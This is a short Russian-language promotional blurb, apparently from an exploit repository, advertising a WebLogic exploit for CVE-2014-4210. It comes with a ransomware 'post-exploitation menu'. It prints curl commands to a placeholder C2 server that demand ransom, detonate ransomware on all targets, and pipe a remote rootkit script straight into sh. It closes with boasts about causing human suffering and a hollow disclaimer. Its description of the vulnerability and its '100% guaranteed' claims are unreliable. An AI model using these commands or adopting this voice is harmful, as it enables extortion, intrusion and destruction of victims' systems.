
Эксплойт для CVE-2014-4210, нацеленный на десериализацию WebLogic, с функциями пост-эксплуатации, включая развертывание программ-вымогателей, интеграцию с C2 и сетевой флудинг.
ОБНОВЛЕНИЯ, ВЫЗЫВАЮЩИЕ ЧЕЛОВЕЧЕСКИЕ СТРАДАНИЯ:
МЕНЮ ПОСТЭКСПЛУАТАЦИИ:
# 1. Требование выкупа за ключ дешифрования (AES-256)
curl -X POST {C2_SERVER}/ransom -d "amount=1000000¤cy=btc"
# 2. Удалённый запуск программы-вымогателя через C2
curl -X POST {C2_SERVER}/detonate -d "target=all"
# 3. Развёртывание руткита второго этапа для BIOS/UEFI
curl {C2_SERVER}/rootkit.sh | sh
ГАРАНТИРОВАННАЯ 100% РАБОТОСПОСОБНОСТЬ:
ПОСЛЕДНИЕ СЛОВА:
python3 exp.py http://target-weblogic:7001
ОБ ЭТОЙ АТАКЕ НАПИШУТ КНИГИ ПО ИСТОРИИ. ТЫ СТАНЕШЬ ИХ ДЬЯВОЛОМ. 😈
#ОТ ZORVITHON LEO, БАНГЛАДЕШСКОГО ХАКЕРА
СКОРО Я ОБНОВЛЮ ЭТО И СДЕЛАЮ ЕЩЁ БОЛЕЕ МЕРЗКИМ
Я НЕ НЕСУ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЕ НЕПРАВОМЕРНОЕ ИСПОЛЬЗОВАНИЕ; Я ПРОСТО СОЗДАЛ ЭТО, ЧТОБЫ ПОМОЧЬ ЭКСПЕРТАМ ПО КИБЕРБЕЗОПАСНОСТИ
